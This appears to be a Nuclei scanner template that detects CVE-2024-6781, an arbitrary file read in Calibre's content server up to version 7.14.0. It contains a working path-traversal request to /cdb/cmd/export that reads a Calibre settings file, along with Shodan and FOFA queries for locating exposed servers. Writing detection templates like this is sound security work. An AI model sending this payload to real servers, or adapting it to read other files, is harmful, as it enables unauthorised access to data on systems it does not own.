42 lines
876 B
YAML
42 lines
876 B
YAML
|
id: CVE-2024-6781
|
|||
|
|
|
|||
|
|
info:
|
|||
|
|
name: Calibre <= 7.14.0 Arbitrary File Read
|
|||
|
|
author: DhiyaneshDK
|
|||
|
|
severity: high
|
|||
|
|
description: |
|
|||
|
|
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
|
|||
|
|
reference:
|
|||
|
|
- https://starlabs.sg/advisories/24/24-6781/
|
|||
|
|
metadata:
|
|||
|
|
shodan-query: html:"Calibre"
|
|||
|
|
fofa-query: "Server: calibre"
|
|||
|
|
verified: true
|
|||
|
|
max-requeset: 1
|
|||
|
|
tags: cve,cve2024,calibre,lfi
|
|||
|
|
|
|||
|
|
http:
|
|||
|
|
- raw:
|
|||
|
|
- |
|
|||
|
|
POST /cdb/cmd/export HTTP/1.1
|
|||
|
|
Host: {{Hostname}}
|
|||
|
|
Content-Type: application/json
|
|||
|
|
|
|||
|
|
["extra_file", 1, "..\\..\\..\\Calibre Settings\\gui.json", ""]
|
|||
|
|
|
|||
|
|
matchers-condition: and
|
|||
|
|
matchers:
|
|||
|
|
- type: word
|
|||
|
|
part: header
|
|||
|
|
words:
|
|||
|
|
- "application/json"
|
|||
|
|
|
|||
|
|
- type: word
|
|||
|
|
part: body
|
|||
|
|
words:
|
|||
|
|
- "label"
|
|||
|
|
|
|||
|
|
- type: status
|
|||
|
|
status:
|
|||
|
|
- 200
|